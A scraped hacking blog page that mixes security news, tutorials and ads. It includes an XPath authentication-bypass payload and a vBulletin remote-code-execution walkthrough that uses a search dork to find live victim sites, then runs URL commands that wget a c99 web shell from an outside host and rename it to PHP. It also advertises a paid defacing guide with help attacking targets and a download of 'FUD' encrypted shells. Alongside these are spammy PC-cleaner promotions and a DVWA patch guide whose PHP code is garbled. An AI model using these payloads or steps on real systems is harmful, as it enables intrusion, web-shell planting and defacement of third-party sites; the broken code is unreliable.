Latest Post
Sign up for FREE daily Updates.

iOS Update Quashes Dangerous SSL Bug

5497202855_bbbca2a000_o.jpg

Photo by: Duncan Hull


If you haven't gotten the iOS 7.0.6 update, you need to stop what you're doing and get it now. There's a dangerous SSL bug that can hurt you in numerous ways if you don't take care of it right away by updating your Apple operating system. Even if you have an older version, you're going to want to make sure you're protected and have the latest OS available for your particular mobile device.


Back in February of this year, it came out that not updating could lead to bad people being able to read and modify encrypted communications whether people were using iPhones, iPads or other iOS devices. As you might imagine, this upset a lot of people. The good news is that Apple was pretty quick at making sure an update was available for people who downloaded it.


And yet that's part of the problem - not everyone updates their operating system on their own, especially on their phone or mobile device. Some people have claimed that it wasn't a flaw and was built-in iOS as a means for people - like the NSA perhaps - to be able to spy on people easier. Apple denied the claims, of course, but if you Google around, you're going to find some interesting speculation about the "flaw" found in iOS.


According to Ars Technica, the problem may have gone beyond iOS mobile devices and actually affected Mac OS X users - even if they had all the current patches and updates installed! According to them, "[The] vulnerability has been confirmed in iOS versions 6.1.5, 7.0.4, and 7.0.5, and OS X 10.9.0 and 10.9.1." That's quite a wide vulnerability. And while Apple seemed to be working fast to squash the bug last month, there's a good chance that a lot of people still don't have it patched.


In order to make sure you stay safe, here are some specific tips you should follow.


  • Always Update - The first thing you want to do is make sure you ALWAYS update your OS when you find out there's a new version available.
  • Be Aware - In order to know when you should update your OS, you're going to make sure you're aware of major problems that have been found.
  • Act Quickly - The sooner you patch the vulnerable code, the sooner you're going to be safe from attacks.


While there's no guarantee your mobile devices are going to be safe and secure, you want to make sure you take whatever steps you can to guarantee that you're as safe as possible. If you have any thoughts or opinions about the latest iOS update that killed some major security flaws, feel free to leave a comment below and let us know what you're thinking.


Guest Post:

Written by: Jenny Corteza has used a City Directory Theme because it made her life as a writer a whole lot easier. She's been writing technology articles for many years now.
 

WhatsApp spam used by ASProx Botnet to Deliver Kuluoz Malware

5448944597_8e70da64ab_o.png

Photo by: Sean MacEntee




As you probably know, Facebook bought WhatsApp for an obscene amount of money in stock earlier this year. What you might not know is that there's a lot of WhatsApp spam that is being used by ASProx Botnet to deliver nasty Kuluoz malware to unsuspecting  users. This is not good news any way you look at the situation. Keep reading if you want to know more about this as well as what you should do to stay safe.


Here's a look at some of the dates when the WhatsApp problem has made Malcovery's "Today's Top Threats" list.


  1. SEPTEMBER 19, 23, 24, 25, 26
  2. OCTOBER 2, 3, 4, 7, 8, 9, 10, 11, 16, 17, 18, 21, 22, 23, 24, 25
  3. NOVEMBER 14
  4. JANUARY 9, 13, 15, 20, 28


Looking at that list, it's easy to start wondering why nothing has been done sooner about the problem. Additionally, it really makes you wonder why Facebook paid so much for the company by offering them stock options.


Going back to November of last year, ComputerWorld published an article about how WhatsApp was one of the top five brands imitated to deliver malware with spam. That's quite a bit of recognition - and not in a good way.


Here's a look at some specific ways you can stay safe and avoid Kuluoz and other malware.

  • Use Protection - The very first thing you want to do is make sure you're using some type of protection. The good news is that you don't need to spend a lot of money to get decent anti-virus software these days.
  • Update Protection - Having protection software is nice, but if you never update it at all, you're going to find that there's still a high chance your computer will get infected and quit working correctly.
  • Be Suspicious - If you're not sure of something online, you want to err on the side of caution and not take any unnecessary risks. Even with a brand like WhatsApp - that's connected to Facebook now - you want to be very careful and know what you're doing.
  • Educate Yourself - Last but most certainly not least, you should make an effort to stay informed about how malware works and the steps you can take to protect yourself from it whenever possible. This is really the best way you can make sure your computer stays safe and virus free.


Following the advice above, there's a good chance you'll be able to avoid WhatsApp spam and not get infected with Kuluoz malware. Still, it's a good idea to pay attention and update your anti-virus software all the time. If you have any experience with WhatsApp that's negative, please leave us a comment below. 







Guest Post - 
 
Written by: Jenny Corteza deals with staff outsourcing all the time. She's a writer and dealing with editors and others can sometimes be a problem. Still, she loves writing articles about technology. Go figure.





 

What is xPath Injection? How to exploit with xPath? [Part 1]

xPath Injection occurs when inputs supplied by the users are not properly sanitized and a malicious attacker is able to send and construct a malformed xPath query for XML data with the intention to extract sensitive information to which normal users don't have access to. It is similar to SQL Injection where attackers does the same, in SQL Injection, SQL queries are made and in xPath Injection, xPath queries are made for XML data/. Queries XML is done through xPath which is type of a simple descriptive statements that allows XML query to locate certain information.

To understand more clearly how a XML document looks like, have a look below. It is a simple XML document codes to authenticate a user based upon the combination of username and password they entered.


<users>
<user>
<name>Administrator</name>
<username>hackingsec</username>
<password>password123!</password>
<admin>1</admin>
</user>
<user>
<name>Admin</name>
<username>admin</username>
<password>reddit12</password>
<admin>0</admin>
</user>
</users>
















When the username 'admin' and password 'reddit12' are entered, the following xPath query is executed

/*[0]/user[username=”admin” and
password=”reddit12”]

Which would return the following

<user>
<name>Admin</name>
<username>admin</username>
<password>reddit12</password>
<admin>0</admin>

</user>


Exploiting xPath Injection : Authentication Bypass

An malicious user can bypass the authentication by sending specially crafted input query.

/*[0]/user[username=”admin” and password=”reddit12”]

If an attacker submits the following malicious input:

username: admin" or "1" ="1
password: anything

the XPATH query which will be executed will be the following:

/*[0]/user[username=”admin" or "1"="1” and
password=”anything”]

The XPath query will result in authentication bypass and an attacker will be able to login to the
application as user "admin". This is because the OR clause in the XPath query is a condition which is always true. Under XPath (similar to SQL) the AND clause has precedence over the OR clause, so the XPath query will be evaluated as shown by the following pseudo-code:

username ="admin" or [TRUE AND False]
which will result in:
username ="admin" or FALSE

As the username admin is valid, the attacker will be able to login as this user.


That was a basic introduction to tell you, what xPath actually is and to exploit it. I will be dividing this post into 3 separate parts. This was the 1st part, in 2nd part I will be explaining how to extract database information through xPath Injection. In 3rd part we will be talking about some automated tools for exploiting xPath Injection.
 

What is Remote Code Execution? How to Hack Websites

According to Wikipedia, Remote Code Execution can be defined as “In computer security, arbitrary code execution or remote code execution is used to describe an attacker's ability to execute any commands of the attacker's choice on a target machine or in a target process. It is commonly used in arbitrary code execution vulnerability to describe a software bug that gives an attacker a way to execute arbitrary code. A program that is designed to exploit such vulnerability is called an arbitrary code execution exploit. Most of these vulnerabilities allow the execution of machine code and most exploits therefore inject and execute shell code to give an attacker an easy way to manually run arbitrary commands. The ability to trigger arbitrary code execution from one machine on another (especially via a wide-area network such as the Internet) is often referred to as remote code execution”

vBulletin RCE Injection

Few websites running vBulletin are vulnerable to Remote Code Execution, by exploiting the vulnerability we can get our PHP backdoor shell uploaded on the website. We’ll use a dork to find the vulnerable website.

Note: Don’t keep yourself restricted when it comes to using dorks, use other search engines too other than Google, like Bing, Yahoo etc. Use of multiple search engines will help you to get more vulnerable websites.

Dork: inurl:faq.php & intext:"Warning: system() [function.system]"

Now, select any website of your choice from th search result, and go to its faq.php page. If the website is vulnerable, you will get the following on the page.


You will get an error similar to Warning: system() [function.system]: Cannot execute a blank command in [path]/faq.php(324) : eval()'d code on line 1

So, firstly upload your PHP shell on any free hosting website or you can use sh3ll.org/c99.txt as it has already got an uploaded .txt shell. (We will be first uploading our shell in .txt form, and later will be changing the extension to .php after the upload process is completed.

Suppose the vulnerable website is http://www.vulnerable.com/faq.php. So in order to upload our shell enter the following in the URL bar:

http://www.vulnerable.com/faq.php?cmd=cd /tmp;wget http://sh3ll.org/c99.txt

To check if we were able to successfully upload our shell, enter the following in the URL bar 
http://www.vulnerable.com/faq.php?cmd=cd /tmp;ls -la c99.txt

Were c99.txt is the name of your uploaded shell. If we were successful in uploading our shell, we see the following text on the page. (Might be a little different in some cases)
-rw-r—r—1 nobody nobody

We know that our shell is successful uploaded on the website, now it’s time to change the file format from .txt to .php in order to execute it on the server.

http://www.vulnerable.com/faq.php?cmd=cd /tmp;mv c99.txt check.php
(You can change check.php to any other name of your choice)

Now, the file format is change. It’s time to execute our shell, so to execute it enter the following in the URL bar
http://www.vulnerable.com/faq.php?cmd=cd /tmp;mv c99.txt check.php
 

Bingo!! We successfully exploited vBulletin Remote Code Execution Vulnerability.

 

Technology and it's threat


Technology and its threat

It's true that technology makes everyone dance on its tone. Now we have computers with the help of which we can get information about everything. It has also changed the way of communication. Earlier we use to talk via letters and phones. But, now we have a webcam through which we can do video calling or conferencing. It's true that machines have been created by men, but they make fewer mistakes as compared to men. You just need to program the computer properly and it will work accurately. With the help of computer everything is done perfectly in less time. Now days it’s not surprising if students carry their laptop and mobile to school. Technology has truly made our lives easier.



But a computer also faces health issues, which can be treated by an Antivirus Software program.
Following are  top 8 threats and no one should ever ignore them

Viruses: - The name itself describes it. It can disrupt a computer and can damage the available data. Viruses can be received via numerous options that also include e-mail attachments. So, always beware when you get an e-mail from an unidentified server or person.

Spyware: - A Spyware is used to spy on computers. It can steal your personal information and send it to others who can misuse it. Today everyone is concerned about being the victim of identity theft. Spyware are generally attached to a freeware downloaded from the web. So be cautious when downloading and installing a software tool.

Spam: - Spam mails are promotional in nature and usually promote products of sexual or dubious nature. Some websites are harvested by spammers, from where they steal your e-mail ids.
Adware: - Adware are responsible for producing advertisements on a system without user’s consent, which you often see on your computer screen. It can be in the form of pop-ups, pop-under, and other sources. People generally do get irritated by these adware but at many times are not aware of its causes.

Dialers: - Dialers are the programs, which are designed to redirect phone calls to expensive numbers without even informing you. You’ll get to know about it, when you will receive the bill.
Hackers: - A computer always consists of so much personal data, including your bank and credit card details. Hackers always try to steal this data and recover your passwords in order to do malicious activities and even may burgle you.

Hijackers: - The hijackers take remote control of your computer screen and can reset your homepage and search pages. They do it in order to do thievery on your behalf so that they can be away from the agencies and you’ll be in danger.

Phishing: - Phishing has become the most threat full of all malicious activities over the internet. It is because Phishing websites look similar to the real websites, and are designed to make fools out of the customer and are generally scams to harvest usernames and passwords of prominent websites.

In order to be away from these 8 threats, download Security Software Optimo Defender, which also scans for threats and performs virus removal programs on a computer by offering various features like Antivirus,

Anti-Trojan, Anti-Spyware, and System Security Suite. There are a lot of Antivirus programs available on the internet, but like everything else they also vary in quality. You tend to get what you pay for.
Anna Asthesia is chief technical head in optimodefender.com & working from last 5 years. She likes to write article on antivirus software program, security software & how to find genuine online tech support for Laptops, Computers & Smartphones.

About the Author
Anna Asthesia is chief technial head in optimopro.com & working from last 5 years. She likes to write article on windows registry , computer problems & how to find genuine online tech support for Laptops, Computers & Smartphones.You can read her latest blogs onblog.optimopro.com


 

How To Speed Up Your Computer with Optimo Pro

Computer users are inundated with tribulations frequently. The way you eat food to keep you going and to keep you fit, likewise, computer machine also needs maintenance every now and then. Your body demands food to keep you going. So how can your computer lag behind? Computer optimization is the buzz word. Everyone wants to speed up computer to reap more benefits.

Regular holdups that stall the computer’s performance become a complete nuisance. Virus attacks, malware intrusions, Trojan horse, and other cruel problems slow down the speed of your system. But most of the users find it difficult to understand the problem and resolve them. What you require is good quality pc cleaner that deals with junk files, registry errors and much more.
Quite a few PC cleaners are doing the rounds in the market, some fake and some real. Fake ones rather than solving any setback embed a set of virus and infections that results in loss of time and money. Real ones effectively optimize your computer system that helps speed up computer.
Optimo Pro is software that comes with more than one program. They scan the computer within minutes and help the customer get back to work. Within months of its launch, Optimo Pro has had immense outreach and has helped computer users, be it consumers or business. The increased usage of Optimo Pro has been phenomenal.



What all it does?

  • Removes data footprints from at least 25 browsers
  • Protects your confidentiality
  • Wipes and cleanses up to 25 browsers like Google Chrome, Safari, Firefox
  • Takes care of the clutter that clogs the system
  • Features:
  • Windows Registry cleaner
  • Apps Errors cleaner
  • Files cleaner
  • Browser cleaner
  • Short cut cleaner
  • Trace cleaner
  • Registry Optimizer
  • Junk Files cleaner
  • PC Optimizer
  • Complete computer cleaning software



All these apps work in tandem with each other and help increase the speed of your PC. A PC cleaner acts a scrubber that scrubs manifold parts of the computer and helps keep it in good shape. Be it fixing your registry or cleaning junk files, it does all.
With the kind of success Optimo Pro has gathered, it becomes worthwhile to at least give it a try. Download Optimo Pro from www.optimopro.com  and make use of the trial version. Our customer service number is 1-800-413-1289. You can ask any question and we will be more than happy to serve you.

About the Author
Anna Asthesia is chief technial head in optimopro.com & working from last 5 years. She likes to write article on windows registry , computer problems & how to find genuine online tech support for Laptops, Computers & Smartphones.You can read her latest blogs on blog.optimopro.com

 

[BUY] "Website Defacing Cookbook ~ A Step by Step Guide to Website Defacing"

Do you want to learn how website hackers manage to deface website and change it's index pages with their own fancy coded pages. If your answer is 'YES' then surly you are at a right place. We are selling an e-book titled "Website Defacing  Cookbook ~ A Step by Step Guide to Website Defacing"
with the help of you will be able to deface 60%-70% of the websites present of the WORLD WIDE WEB (WWW) i.e. on The Internet.
For Hacking Sec readers we are selling this book for only 12$ with 24*7 email assistance if you are struck somewhere while performing the methods described in the book.




"Website Defacing Cookbook" is a step by step guide to defacing, revealing the secrets, methods and techniques used by around 60% - 70% of web defacers to deface website. All the methods described in the book includes screenshots and POC (proof-of-concept) to help you understand and learn better.

We are giving 24*7 email support if you are having any problem in understanding any of the methods described in the book. Just e-mail us with your query and we will e-mail you back within 24 hours of your request with the solution to your query. If you need any other information regarding this book. Just hit me with an e-mail at codesmasher007@gmail.com

We are giving 10 days money back guarantee too, so HURRY UP

Just spend 12$ and learn methods which will help you to deface almost 60%-70% Websites and Servers present on the Internet.
We will help you too, in defacing your targets, when you buy our book with 24x7 email assistance and support.


Want to Buy?

You can buy this book through Paypal, Just visit 

And order your book.

Having any query regarding this book, feel free to contact us at codesmasher007@gmail.com


 

Basics Of Wi-Fi Security



Hi all today i am just going to discuss how you can secure your wifi network from hackers. you must have came across many tips on securing wifi network from various blogs and all but here we will discuss from a hackers point of view and all practical and genuine approach to securing Wi-Fi network so lets begin.










 

 

Tips On Securing Wi-Fi Network -


Be Sure To Use the strongest wireless encryption your modem or router provide Making your wireless modem with wpa or wpa2 encrypt do give a trust that your wifi netwok is safe. Typically our router or modem uses various methods of encryption to protect data sent over wifi network. Always use WAP or WPA2 to use secure your wifi network if your router/modem is not having those encryption then never select that brand router/modem. If your modem/router does not provide WPA or WPA2 encryption it is strongly recommended that a new device be purchased.So you must have heard about WEP (Wired Equivalency Privacy) it is quite older technique of securing which easy for hackers to crack with that I can never say you are completely secure.




Remember the use(Change default pass) of strongest possible network password / network
key always ensure better security -














Again Its a simple tips which applies on all field for better security, As  you know general rule, the longer and more complicated the password, the more difficult for hackers to crack it. I do recommend to use minimum an eight character password should be used to allow access to your wireless network. And remember don't forget to change your modem/router default password people do forget it many time which lead to compromise the wifi network. Never use the same password to control or access more than one system or program and never use your wireless network name as your password! Doing such stupid activity makes things too easy for anyone to hack your wifi easily. Its obvious thing that most of the time our modems are designed to use a default password such as “admin”, “password” or the manufacturer’s name. These settings are easily accessible to a user when the modem and network is being set up, however because they are easily accessible and often use weak passwords will unless changed, remain potentially accessible to anyone who wishes to gain access. There are many sites available on internet which give away default passwords for modems /routers (vendor specific as well). Changing your modem or router’s default password offers a simple but effective security measure against unauthorized remote access.




Hide your SSID (network name)  - 









I know the Wi-Fi network is still Hack-able when SSID Is hidden but it makes thing bit difficult for hackers to crack any Wi-Fi network which is invisible. Typically all Wi-Fi network broadcast its presence (beacon frames) when they are turned on so making the SSID hidden keep another layer of protection in securing Wi-Fi network because if the network is not broadcasting its name that make difficult for hackers to hack it.




Access to Remote modem administration -

These days most modern modems or routers can be remotely administered over the internet. If yours can, then someone besides you can potentially locate your modem’s IP (Internet Protocol) address and potentially hack your modem.A simple fix to this vulnerability is to disable remote administration for your modem or router. If you absolutely require remote access then you can try limiting access to a particular IP address or limited range of addresses, to reduce the chance of unauthorized users gaining access to your modem’s configuration settings. As a general rule for home networks, remote access is not necessary and possibly the safest thing is to disable remote access to your modem/router.




MAC address filtering for improve security -



Encryption including WPA2 and strong passwords are the best methods to control who accesses your network, however most modems and routers offer further methods to control your network. It is a better option to make your Wi-Fi network more secure is to use mac filter as you know mac address (unique hardware address of a system)  so it ensure better protection .i know mac address can be spoofed but with all WPA2 and strong password ,mac filtering whole together ensure better security . All Most all modern modems offer the capability to restrict access to a wireless network to known devices (known MAC addresses). Trouble here is if you not setting mac filter properly then you man miss the Wi-Fi services (cannot connect to the network).





Enable modem/router firewall and security features -

Most modern modems and routers come standard with a built in firewall. A firewall can prevent unauthorized people accessing your network, can control which programs inside the network access the internet and should be enabled by default.Some hi-tech modems and routers also feature security programs known generally as intrusion detection systems (IDS). Such systems are capable of detecting attempts at unauthorized access to the system they are protecting and block many forms of attack. For additional security, all computers connected to your network should also have a software firewall system installed, or the manufacturer provided operating system firewall enabled.




Update your modem/router Firm-ware -

Some if your modem is outdated firm ware it may lead to some ready-made exploits using which any attacker can hack your network so it’s better to update firmware also the modem manufacturer provide this update firmware service for free (On modem’s website). Also keep one thing on mind unnecessary you should not make your wifi modem broad cast signal to long distance range (100m).its better to limit your modem/router signal upto 20-30 m. also always better to keep your modem at central position.So keep these things on mind while installing any wifi network and i am sure the hackers will definitely have to go through Hercules task.




This article is a Guest post by -  Chandrakant Nial


 

New And Latest FUD Encrypted Shells Collection 2013

 New And Latest FUD Encrypted Shells Collection



Interface Of Shells 

=====================================================================





















Download Link :- Link 1 

 

Top 3 Apps To Change Your Android Interface

Tried of your boring android default interface, want to try something new, to make it look more cool and different, if YES you are at the right place. Today in this post I will be telling you about some cool android application that will completely change the experience on your phone.

So here's the list of Top 3 Android Application to make your phone more cool.


GO Launcher EX


This is one of the most downloaded application on Google App Store for customizing the UI of the phone and make it awesome. It has got plenty of totally customizable themes which allows you to customize your icons, lock screens and much more.

Download


Aviate


Aviate is a different type of app, it is totally different from other present on the app market. It changes as per your recent activity and also changes according your location. Sadly there are some bugs present but don't worry you won't have to deal which crashes. Although this application is available for download only on invites but if your lucky enough you will get a invite for free available on many tech portals.

Download 


Themer


Themer is my personal favorite application, this is the best app for transforming the look of your android UI. There are more than 52,000 different looking homescreens for Themer available for downlaod. Every theme you download has got totally different style and layout.

Download 
 

Fixing/Patching DVWA Remote command Execution vulnerability



Hi readers! its me Rishal. It's been so long since i have posted any good tutorial, so today i will be showing you all something new & interesting which is "Fixing DVWA Remote command Execution vulnerability". Let's get started.



 
Things Required:

  • DVWA Installed on your localhost



Step by Step Guide:


  • Login into dvwa & set the security level to low. 























  • Go to the command execution Vulnerable Application. Now let's first test it by executing come command. In my case i'm using Windows OS so i will be using windows command "dir". 
         Command - 127.0.0.1 | dir 

         Now once the command gets executed you should get a result showing some volume info & the files in the current directory as shown in the below image. 






  • Now its very clear that the web application is vulnerable to the command execution vulnerability. Now let's check thew source code of the webpage.  Just click on view source below the webpage. 






 

As you can see in the source code there is "NO" filtration for the data entered by the user, therefore allowing the attacker to pass arbitrary commands.  To implement a fix we will have to add a filtration to the data entered by the user in the field.




The Fix :

  • escapeshellarg() - It adds single quotes around a string and quotes/escapes any existing single quotes allowing you to pass a string directly to a shell function and having it be treated as a single safe argument. This function should be used to escape individual arguments to shell functions coming from user end.

 Fix -

<?php
if( isset( $_POST'submit' ] ) ) {

    
$target escapeshellarg($_REQUEST'ip' ]);

    
// Determine OS and execute the ping command.
    
if (stristr(php_uname('s'), 'Windows NT')) { 
    
        
$cmd shell_exec'ping  ' $target );
        echo 
'<pre>'.$cmd.'</pre>';
        
    } else { 
    
        
$cmd shell_exec'ping  -c 3 ' $target );
        echo 
'<pre>'.$cmd.'</pre>';
        
    }
    
}
?>
 Result - 
 

  • escapeshellcmd() - This function is used to escape any character in a string that might be used to trick a shell command into executing any arbitrary commands. By escaping any character it ensures that any data coming from user end is filtered before it is passed to exec() or system().
Fix -


<?php
if( isset( $_POST'submit' ] ) ) {

    
$target escapeshellcmd($_REQUEST'ip' ]);

    
// Determine OS and execute the ping command.
    
if (stristr(php_uname('s'), 'Windows NT')) { 
    
        
$cmd shell_exec'ping  ' $target );
        echo 
'<pre>'.$cmd.'</pre>';
        
    } else { 
    
        
$cmd shell_exec'ping  -c 3 ' $target );
        echo 
'<pre>'.$cmd.'</pre>';
        
    }
    
}
?>



Result -
Hope you all learned something new :). Keep yourself updated to our website by liking our Facebook Fan Page.  
 
 
Support : Blog | Hacking-Sec | PHP-Sec
Copyright © 2014. Hacking-Sec - All Rights Reserved